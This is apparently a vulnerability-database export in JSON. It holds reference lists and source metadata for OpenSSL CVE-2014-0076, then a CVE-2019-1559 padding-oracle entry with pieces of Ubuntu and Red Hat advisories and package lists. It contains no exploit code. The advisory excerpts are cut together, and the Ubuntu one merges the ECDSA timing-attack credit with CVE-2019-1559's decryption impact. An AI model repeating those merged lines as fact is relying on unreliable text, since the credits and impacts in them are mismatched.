"https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04378799" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04379485" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04337774" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04336637" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037392" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037189" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037307" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671096" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676673" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671128" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671127" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670640" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21670640" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671100" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671098" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676041" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670316" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037451" }, { "trust": 0.3, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10071" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/33a01-5228bdf5d027e/cert_security_mini-_bulletin_xrx15ao_for_cq8570-cq8870_v1-0.pdf" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15295.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020021" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670401" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037380" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037382" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037384" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670905" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037379" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037381" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037383" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037393" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21670165" }, { "trust": 0.3, "url": "http://forums.alienvault.com/discussion/3054/security-advisory-alienvault-v4-10-0-addresses-several-vulnerabilities" }, { "trust": 0.3, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-345106.htm" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004582" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095143" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095144" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676840" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020038" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671197" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682023" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670301" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670302" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670576" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682026" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682025" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682024" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21669859" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004616" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095841" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095217" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673715" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670339" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095203" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21688949" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678668" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676424" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676092" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21695392" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21681249" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671133" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004608" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020694" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670560" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670858" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673696" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020976" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020952" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095066" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004615" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21669664" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100179859" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100179858" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://h17007.www1.hp.com/us/en/enterprise/servers/solutions/info-library/ind" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-511c3e0b2f6f4f6bbc796fc619" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-bd9a1cf60e344c549c4888db93" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-3395d737d98f42149125b9bb05" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-3a7aa5e233904ebe847a5e1555" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-d775367b0a28449ca05660778b" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-e8076c2a35804685ad65b2b1ba" }, { "trust": 0.2, "url": "http://h18013.www1.hp.com/products/servers/management/hpsim/download.html" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160" }, { "trust": 0.2, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.2, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0076" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/310.html" }, { "trust": 0.1, "url": "https://github.com/uvhw/uvhw.bitcoin.js" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://threatpost.com/second-nsa-crypto-tool-found-in-rsa-bsafe/105143/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-0076" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=33767" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2165-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4378" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3487" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4379" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht1222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0238" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0185" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1943" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4376" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7345" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4377" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4350" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4381" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2525" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0237" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3480" }, { "trust": 0.1, "url": "http://www.vsecurity.com/)" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2270" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0207" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3515" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht6367" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3479" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1391" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3478" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4049" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4374" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3981" }, { "trust": 0.1, "url": "http://h18013.www1.hp.com/products/servers/management/fpdownload.html" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-2c54f23c6dbc4d598e86fdef95" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-4480df0f6d544779b0143f5c3b" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0289" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0209" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0195" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3571" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3566" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-5298" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0287" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0286" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3513" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0224" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8275" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3567" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3572" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0289" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3470" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3513" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0204" }, { "trust": 0.1, "url": "http://openssl.org/news/secadv_20150319.txt" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0198" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3570" }, { "trust": 0.1, "url": "http://openssl.org/news/secadv_20150108.txt" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3571" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0221" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0288" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0206" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0205" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3567" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3570" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8275" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3572" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3569" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0293" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0206" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "http://www.debian.org/security/" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-8208c3987b1b4a5093f3e8fcc3" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-c0d32bac154a4d93839d8cd1f2" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-8aefeaf490284a7691eca97d13" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:06/openssl.patch.asc" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:06/openssl-10.patch.asc" }, { "trust": 0.1, "url": "http://www.freebsd.org/handbook/makeworld.html\u003e." }, { "trust": 0.1, "url": "http://eprint.iacr.org/2014/140.pdf\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/\u003e." }, { "trust": 0.1, "url": "http://security.freebsd.org/advisories/freebsd-sa-14:06.openssl.asc\u003e" }, { "trust": 0.1, "url": "http://www.openssl.org/news/secadv_20140407.txt\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0076\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:06/openssl-10.patch" }, { "trust": 0.1, "url": "http://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:06/openssl.patch" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0076" }, { "db": "BID", "id": "66363" }, { "db": "PACKETSTORM", "id": "128315" }, { "db": "PACKETSTORM", "id": "127607" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127213" }, { "db": "PACKETSTORM", "id": "127266" }, { "db": "PACKETSTORM", "id": "127608" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "127086" }, { "db": "PACKETSTORM", "id": "126228" }, { "db": "PACKETSTORM", "id": "126961" }, { "db": "PACKETSTORM", "id": "127265" }, { "db": "PACKETSTORM", "id": "128001" }, { "db": "PACKETSTORM", "id": "126097" }, { "db": "PACKETSTORM", "id": "126087" }, { "db": "NVD", "id": "CVE-2014-0076" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-0076" }, { "db": "BID", "id": "66363" }, { "db": "PACKETSTORM", "id": "128315" }, { "db": "PACKETSTORM", "id": "127607" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127213" }, { "db": "PACKETSTORM", "id": "127266" }, { "db": "PACKETSTORM", "id": "127608" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "127086" }, { "db": "PACKETSTORM", "id": "126228" }, { "db": "PACKETSTORM", "id": "126961" }, { "db": "PACKETSTORM", "id": "127265" }, { "db": "PACKETSTORM", "id": "128001" }, { "db": "PACKETSTORM", "id": "126097" }, { "db": "PACKETSTORM", "id": "126087" }, { "db": "NVD", "id": "CVE-2014-0076" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-03-25T00:00:00", "db": "VULMON", "id": "CVE-2014-0076" }, { "date": "2014-02-24T00:00:00", "db": "BID", "id": "66363" }, { "date": "2014-09-19T15:26:13", "db": "PACKETSTORM", "id": "128315" }, { "date": "2014-07-24T23:47:46", "db": "PACKETSTORM", "id": "127607" }, { "date": "2014-07-06T18:53:39", "db": "PACKETSTORM", "id": "127362" }, { "date": "2014-06-25T21:32:38", "db": "PACKETSTORM", "id": "127213" }, { "date": "2014-06-27T18:43:56", "db": "PACKETSTORM", "id": "127266" }, { "date": "2014-07-24T23:48:05", "db": "PACKETSTORM", "id": "127608" }, { "date": "2015-03-27T20:42:44", "db": "PACKETSTORM", "id": "131044" }, { "date": "2017-01-25T21:54:44", "db": "PACKETSTORM", "id": "140720" }, { "date": "2014-06-13T13:31:32", "db": "PACKETSTORM", "id": "127086" }, { "date": "2014-04-21T19:46:40", "db": "PACKETSTORM", "id": "126228" }, { "date": "2014-06-05T21:13:52", "db": "PACKETSTORM", "id": "126961" }, { "date": "2014-06-27T18:43:23", "db": "PACKETSTORM", "id": "127265" }, { "date": "2014-08-26T11:11:00", "db": "PACKETSTORM", "id": "128001" }, { "date": "2014-04-09T23:30:40", "db": "PACKETSTORM", "id": "126097" }, { "date": "2014-04-09T22:49:02", "db": "PACKETSTORM", "id": "126087" }, { "date": "2014-03-25T13:25:21.977000", "db": "NVD", "id": "CVE-2014-0076" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-02-13T00:00:00", "db": "VULMON", "id": "CVE-2014-0076" }, { "date": "2017-05-23T16:25:00", "db": "BID", "id": "66363" }, { "date": "2023-02-13T00:31:07.977000", "db": "NVD", "id": "CVE-2014-0076" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "66363" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL CVE-2014-0076 Information Disclosure Weakness", "sources": [ { "db": "BID", "id": "66363" } ], "trust": 0.3 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "66363" } ], "trust": 0.3 } }
var-201902-0192
Vulnerability from variot
If an application encounters a fatal protocol error and then calls SSL_shutdown() twice (once to send a close_notify, and once to receive one) then OpenSSL can respond differently to the calling application if a 0 byte record is received with invalid padding compared to if a 0 byte record is received with an invalid MAC. If the application then behaves differently based on that in a way that is detectable to the remote peer, then this amounts to a padding oracle that could be used to decrypt data. In order for this to be exploitable "non-stitched" ciphersuites must be in use. Stitched ciphersuites are optimised implementations of certain commonly used ciphersuites. Also the application must call SSL_shutdown() twice even if a protocol error has occurred (applications should not do this but some do anyway). Fixed in OpenSSL 1.0.2r (Affected 1.0.2-1.0.2q). OpenSSL Contains an information disclosure vulnerability.Information may be obtained. The product supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, secure hash algorithms, etc. A vulnerability in OpenSSL could allow an unauthenticated, remote malicious user to access sensitive information on a targeted system. An attacker who is able to perform man-in-the-middle attacks could exploit the vulnerability by persuading a user to access a link that submits malicious input to the affected software. A successful exploit could allow the malicious user to intercept and modify the browser requests and then observe the server behavior in order to conduct a padding oracle attack and decrypt sensitive information. The appliance is available to download as an OVA file from the Customer Portal. ========================================================================== Ubuntu Security Notice USN-4376-2 July 09, 2020
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 ESM
- Ubuntu 12.04 ESM
Summary:
Several security issues were fixed in OpenSSL. This update provides the corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM.
Original advisory details:
Cesar Pereida Garc\xeda, Sohaib ul Hassan, Nicola Tuveri, Iaroslav Gridin, Alejandro Cabrera Aldaya, and Billy Brumley discovered that OpenSSL incorrectly handled ECDSA signatures. An attacker could possibly use this issue to perform a timing side-channel attack and recover private ECDSA keys. A remote attacker could possibly use this issue to decrypt data. (CVE-2019-1559)
Bernd Edlinger discovered that OpenSSL incorrectly handled certain decryption functions. (CVE-2019-1563)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 ESM: libssl1.0.0 1.0.1f-1ubuntu2.27+esm1
Ubuntu 12.04 ESM: libssl1.0.0 1.0.1-4ubuntu5.44
After a standard system update you need to reboot your computer to make all the necessary changes. Description:
Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: openssl security and bug fix update Advisory ID: RHSA-2019:2304-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2019:2304 Issue date: 2019-08-06 CVE Names: CVE-2018-0734 CVE-2019-1559 ==================================================================== 1. Summary:
An update for openssl is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.
Security Fix(es):
-
openssl: 0-byte record padding oracle (CVE-2019-1559)
-
openssl: timing side channel attack in the DSA signature algorithm (CVE-2018-0734)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.7 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1644364 - CVE-2018-0734 openssl: timing side channel attack in the DSA signature algorithm 1649568 - openssl: microarchitectural and timing side channel padding oracle attack against RSA 1683804 - CVE-2019-1559 openssl: 0-byte record padding oracle
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.2k-19.el7.src.rpm
x86_64: openssl-1.0.2k-19.el7.x86_64.rpm openssl-debuginfo-1.0.2k-19.el7.i686.rpm openssl-debuginfo-1.0.2k-19.el7.x86_64.rpm openssl-libs-1.0.2k-19.el7.i686.rpm openssl-libs-1.0.2k-19.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.2k-19.el7.i686.rpm openssl-debuginfo-1.0.2k-19.el7.x86_64.rpm openssl-devel-1.0.2k-19.el7.i686.rpm openssl-devel-1.0.2k-19.el7.x86_64.rpm openssl-perl-1.0.2k-19.el7.x86_64.rpm openssl-static-1.0.2k-19.el7.i686.rpm openssl-static-1.0.2k-19.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.2k-19.el7.src.rpm
x86_64: openssl-1.0.2k-19.el7.x86_64.rpm openssl-debuginfo-1.0.2k-19.el7.i686.rpm openssl-debuginfo-1.0.2k-19.el7.x86_64.rpm openssl-libs-1.0.2k-19.el7.i686.rpm openssl-libs-1.0.2k-19.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.2k-19.el7.i686.rpm openssl-debuginfo-1.0.2k-19.el7.x86_64.rpm openssl-devel-1.0.2k-19.el7.i686.rpm openssl-devel-1.0.2k-19.el7.x86_64.rpm openssl-perl-1.0.2k-19.el7.x86_64.rpm openssl-static-1.0.2k-19.el7.i686.rpm openssl-static-1.0.2k-19.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.2k-19.el7.src.rpm
ppc64: openssl-1.0.2k-19.el7.ppc64.rpm openssl-debuginfo-1.0.2k-19.el7.ppc.rpm openssl-debuginfo-1.0.2k-19.el7.ppc64.rpm openssl-devel-1.0.2k-19.el7.ppc.rpm openssl-devel-1.0.2k-19.el7.ppc64.rpm openssl-libs-1.0.2k-19.el7.ppc.rpm openssl-libs-1.0.2k-19.el7.ppc64.rpm
ppc64le: openssl-1.0.2k-19.el7.ppc64le.rpm openssl-debuginfo-1.0.2k-19.el7.ppc64le.rpm openssl-devel-1.0.2k-19.el7.ppc64le.rpm openssl-libs-1.0.2k-19.el7.ppc64le.rpm
s390x: openssl-1.0.2k-19.el7.s390x.rpm openssl-debuginfo-1.0.2k-19.el7.s390.rpm openssl-debuginfo-1.0.2k-19.el7.s390x.rpm openssl-devel-1.0.2k-19.el7.s390.rpm openssl-devel-1.0.2k-19.el7.s390x.rpm openssl-libs-1.0.2k-19.el7.s390.rpm openssl-libs-1.0.2k-19.el7.s390x.rpm
